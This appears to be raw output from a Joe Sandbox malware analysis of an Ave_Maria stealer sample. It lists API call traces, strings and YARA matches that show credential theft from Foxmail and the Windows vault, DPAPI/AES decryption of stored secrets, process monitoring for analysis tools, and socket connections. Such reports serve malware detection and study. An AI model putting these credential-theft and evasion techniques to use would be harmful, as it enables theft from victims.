                                                                              • Part of subcall function 0041111B: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,0041563F,?), ref: 00411152
                                                                              • Part of subcall function 0041111B: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00411167
                                                                              • Part of subcall function 00410F61: LoadLibraryA.KERNEL32(ntdll.dll), ref: 00410F79
                                                                              • Part of subcall function 00410F61: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00410F89
                                                                              • Part of subcall function 004111D7: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,?,?,?,?,00000000,?,?,?), ref: 0041121B
                                                                            • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?,?,?,?), ref: 00402F1A
                                                                            • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 00402F2C
                                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 00402F3A
                                                                              • Part of subcall function 0040906F: InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 0040907B
                                                                              • Part of subcall function 0040906F: DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 00409092
                                                                              • Part of subcall function 0040906F: EnterCriticalSection.KERNEL32(0055A808,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 0040909E
                                                                              • Part of subcall function 0040906F: GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 004090AE
                                                                              • Part of subcall function 0040906F: LeaveCriticalSection.KERNEL32(0055A808,?,00000000), ref: 00409101
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalFileSection$CreateInitializeProcess$ChangeCloseCurrentFindModuleNameNotificationOpenTokenlstrlen$AddressComputerDeleteDirectoryDispatcherEnterExceptionFolderGlobalHandleInformationInstanceLeaveLibraryLoadMemoryPathProcReadSecuritySizeStatusUserlstrcat
                                                                            • String ID: \Microsoft Vision\
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00411E88: lstrcmpA.KERNEL32(?,Q2A,?,open,00413251), ref: 00411EC1
                                                                            • MessageBoxA.USER32 ref: 0041208F
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 004120F8: CreateProcessW.KERNEL32 ref: 00412133
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            Strings
                                                                            • Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper, xrefs: 0041209D
                                                                            • C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe, xrefs: 004120CD
                                                                            • VirtualQuery, xrefs: 00412056
                                                                            • Bla2, xrefs: 00412086, 0041208C, 0041208D
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrlen$CreateDispatcherExceptionFreeMessageProcessUserVirtuallstrcmp
                                                                            • String ID: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper$Bla2$C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe$VirtualQuery
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C5FF
                                                                            • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C60A
                                                                            • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C615
                                                                            • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C620
                                                                            • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C62B
                                                                            • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C636
                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,0040C25A), ref: 0040C639
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal
                                                                            • String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software\Aerofox\FoxmailPreview,00000000,00020019,?), ref: 0040951A
                                                                            • RegQueryValueExA.ADVAPI32(?,Executable,00000000,00000000,00426868,?), ref: 00409541
                                                                            • PathRemoveFileSpecA.SHLWAPI(00426868), ref: 0040954C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileOpenPathQueryRemoveSpecValue
                                                                            • String ID: Executable$software\Aerofox\FoxmailPreview
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: recv
                                                                            • String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 00412155: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00412170
                                                                              • Part of subcall function 00412155: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412185
                                                                              • Part of subcall function 00412155: CloseHandle.KERNEL32(00000000,?,00000000), ref: 004121C1
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            • Sleep.KERNEL32(000003E8), ref: 0040F193
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrlen$CloseCreateDispatcherExceptionFirstFreeHandleProcess32SleepSnapshotToolhelp32UserVirtual
                                                                            • String ID: ProcessHacker.exe$TASKmgr.exe$explorer.exe$regedit.exe
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 004103D3
                                                                            • gethostbyname.WS2_32(?), ref: 004103DC
                                                                            • htons.WS2_32(?), ref: 00410400
                                                                            • InetNtopW.WS2_32(00000002,?,?,00000802), ref: 00410431
                                                                            • connect.WS2_32(00000000,?,00000010), ref: 0041044A
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InetNtopconnectgethostbynamehtonssocket
                                                                            • String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041223D
                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412252
                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0041226A
                                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00412275
                                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00412286
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                            • String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?,00000001,?,00000000,0040A897), ref: 0040B11F
                                                                            • FreeLibrary.KERNEL32(?,?,00000000,0040A897), ref: 0040B12F
                                                                            • FreeLibrary.KERNEL32(?,?,00000000,0040A897), ref: 0040B13D
                                                                            • FreeLibrary.KERNEL32(?,?,00000000,0040A897), ref: 0040B14B
                                                                            • FreeLibrary.KERNEL32(?,?,00000000,0040A897), ref: 0040B159
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?,?,?,00000000,0040A344), ref: 0040AD9D
                                                                            • FreeLibrary.KERNEL32(?,?,?,00000000,0040A344), ref: 0040ADAD
                                                                            • FreeLibrary.KERNEL32(?,?,?,00000000,0040A344), ref: 0040ADBB
                                                                            • FreeLibrary.KERNEL32(?,?,?,00000000,0040A344), ref: 0040ADC9
                                                                            • FreeLibrary.KERNEL32(?,?,?,00000000,0040A344), ref: 0040ADD7
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0040ACBE: LoadLibraryA.KERNEL32(vaultcli.dll,00000000,0040A98E), ref: 0040ACC6
                                                                            • FreeLibrary.KERNEL32(?), ref: 0040AC6B
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 0040335A: lstrcmpW.KERNEL32(?,?), ref: 00403364
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                              • Part of subcall function 00403549: lstrcpyW.KERNEL32 ref: 0040356E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLibrarylstrlen$DispatcherExceptionLoadUserVirtuallstrcmplstrcpy
                                                                            • String ID: 4$8$Internet Explorer
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(ntdll.dll), ref: 00410F79
                                                                            • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00410F89
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: RtlGetVersion$ntdll.dll
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetTempPathW.KERNEL32(00000400,?), ref: 00415333
                                                                            • lstrcatW.KERNEL32(?,send.db), ref: 00415345
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 00403549: lstrcpyW.KERNEL32 ref: 0040356E
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrlen$DispatcherExceptionFreePathTempUserVirtuallstrcatlstrcpy
                                                                            • String ID: 5$send.db
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetTempPathW.KERNEL32(00000400,?), ref: 00415333
                                                                            • lstrcatW.KERNEL32(?,send.db), ref: 00415345
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 00403549: lstrcpyW.KERNEL32 ref: 0040356E
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrlen$DispatcherExceptionFreePathTempUserVirtuallstrcatlstrcpy
                                                                            • String ID: 5$send.db
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004157D1
                                                                            • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 004157E3
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FolderFreePathVirtuallstrcat
                                                                            • String ID: ;$\Microsoft Vision\
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004157D1
                                                                            • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 004157E3
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FolderFreePathVirtuallstrcat
                                                                            • String ID: ;$\Microsoft Vision\
                                                                            • API String ID: 1529938272-253167065
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Control Panel\,00000000,000F003F,l0A,00000000,746CFE60,746CF560,?,?,0041306C), ref: 00412F2C
                                                                            • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Control Panel\,00000000,00000000,00000000,000F003F,00000000,l0A,00000000,?,?,0041306C), ref: 00412F47
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateOpen
                                                                            • String ID: SOFTWARE\Microsoft\Control Panel\$l0A
                                                                            • API String ID: 436179556-2156092134
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,:start,?,?,00412887,00000000,?,?), ref: 004133D0
                                                                            • WriteFile.KERNEL32(00000000,?,77C30770,00000000,00000000,?,00412887,00000000,?,?,?,:start,") do %%A,for /F "usebackq tokens=*" %%A in (",\programs.bat,?), ref: 004133E7
                                                                            • CloseHandle.KERNEL32(00000000,?,00412887,00000000,?,?,?,:start,") do %%A,for /F "usebackq tokens=*" %%A in (",\programs.bat,?,?,?), ref: 004133EE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$CloseCreateHandleWrite
                                                                            • String ID: :start
                                                                            • API String ID: 1065093856-1299720186
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(ntdll.dll), ref: 00410A05
                                                                            • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00410A15
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: RtlGetVersion$ntdll.dll
                                                                            • API String ID: 2574300362-1489217083
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(ntdll.dll), ref: 00410A54
                                                                            • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00410A64
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: RtlGetVersion$ntdll.dll
                                                                            • API String ID: 2574300362-1489217083
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,00000000,?), ref: 004121F1
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004121F8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: IsWow64Process$kernel32
                                                                            • API String ID: 1646373207-3789238822
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(?), ref: 0040D02E
                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 0040D07D
                                                                              • Part of subcall function 00403507: lstrcpyA.KERNEL32(00000000,?,?,00000000,?,00402BD2,?,?,00000000,exit,00000000,start), ref: 0040352C
                                                                              • Part of subcall function 0040594B: getaddrinfo.WS2_32(77C30770,00000000,00404FB9,00000000), ref: 00405998
                                                                              • Part of subcall function 0040594B: socket.WS2_32(00000002,00000001,00000000), ref: 004059AF
                                                                              • Part of subcall function 0040594B: htons.WS2_32(00000000), ref: 004059D5
                                                                              • Part of subcall function 0040594B: freeaddrinfo.WS2_32(00000000), ref: 004059E5
                                                                              • Part of subcall function 0040594B: connect.WS2_32(?,?,00000010), ref: 004059F1
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0040D101
                                                                            • EnterCriticalSection.KERNEL32(?), ref: 0040D11E
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0040D128
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$Leave$Enter$connectfreeaddrinfogetaddrinfohtonslstrcpysocket
                                                                            • String ID:
                                                                            • API String ID: 4195813003-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,?,0040DB4A), ref: 00410BC9
                                                                            • FindResourceW.KERNEL32(00000000,00000001,00000010,?,00000000,00000002,?,?,?,0040DB4A), ref: 00410BDD
                                                                            • LoadResource.KERNEL32(00000000,00000000,?,00000000,00000002,?,?,?,0040DB4A), ref: 00410BE9
                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,00000002,?,?,?,0040DB4A), ref: 00410C2E
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LibraryLoadResource$FindFree
                                                                            • String ID:
                                                                            • API String ID: 3272429154-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0040C3B9: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3D8
                                                                              • Part of subcall function 0040C3B9: LocalAlloc.KERNEL32(00000040,?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C3E6
                                                                              • Part of subcall function 0040C3B9: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3FC
                                                                              • Part of subcall function 0040C3B9: LocalFree.KERNEL32(?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C40A
                                                                            • LocalFree.KERNEL32(?,00000000,-0000003A,00000000,?), ref: 0040C1D1
                                                                              • Part of subcall function 0040C1DD: GetLastError.KERNEL32 ref: 0040C243
                                                                            • LocalFree.KERNEL32(?), ref: 0040C1CA
                                                                              • Part of subcall function 0040C419: BCryptOpenAlgorithmProvider.BCRYPT(00000020,AES,00000000,00000000,?,00000000,?,?,?,0040C1C4,?), ref: 0040C436
                                                                              • Part of subcall function 0040C419: BCryptSetProperty.BCRYPT(00000020,ChainingMode,ChainingModeGCM,00000020,00000000,?,0040C1C4,?), ref: 0040C44F
                                                                              • Part of subcall function 0040C419: BCryptGenerateSymmetricKey.BCRYPT(00000020,0040C1C4,00000000,00000000,?,00000020,00000000,?,0040C1C4,?), ref: 0040C464
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Crypt$Local$Free$BinaryString$AlgorithmAllocErrorGenerateLastOpenPropertyProviderSymmetric
                                                                            • String ID: $DPAPI
                                                                            • API String ID: 379455710-1819349886
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetLastInputInfo.USER32 ref: 004048CC
                                                                            • GetTickCount.KERNEL32 ref: 004048D2
                                                                            • GetForegroundWindow.USER32 ref: 004048E6
                                                                            • GetWindowTextW.USER32 ref: 004048F9
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Windowlstrlen$CountDispatcherExceptionForegroundFreeInfoInputLastTextTickUserVirtual
                                                                            • String ID:
                                                                            • API String ID: 3825627427-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0040FFB4
                                                                            • SetEvent.KERNEL32(00000000), ref: 0040FFC8
                                                                            • WaitForSingleObject.KERNEL32(0042661C,00001388), ref: 0040FFD5
                                                                            • TerminateThread.KERNEL32(0042661C,000000FE), ref: 0040FFE6
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Thread$CurrentEventObjectSingleTerminateWait
                                                                            • String ID:
                                                                            • API String ID: 2174867186-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                            • RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,?,?,?,?,00000000,?,?,?), ref: 0041121B
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                              • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,77C30770,00000000,77C30770,00000000,00000000,?,00000000,?VA,?,?,?,00412B8B,?,?,80000001), ref: 0041258C
                                                                              • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,77C30770,00000000,77C30770,00000000,00000000,?,00412B8B,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 004125B0
                                                                              • Part of subcall function 00412554: RegCloseKey.KERNELBASE(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: QueryValuelstrlen$CloseDispatcherExceptionFreeOpenUserVirtual
                                                                            • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                            • API String ID: 1654648907-1211650757
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
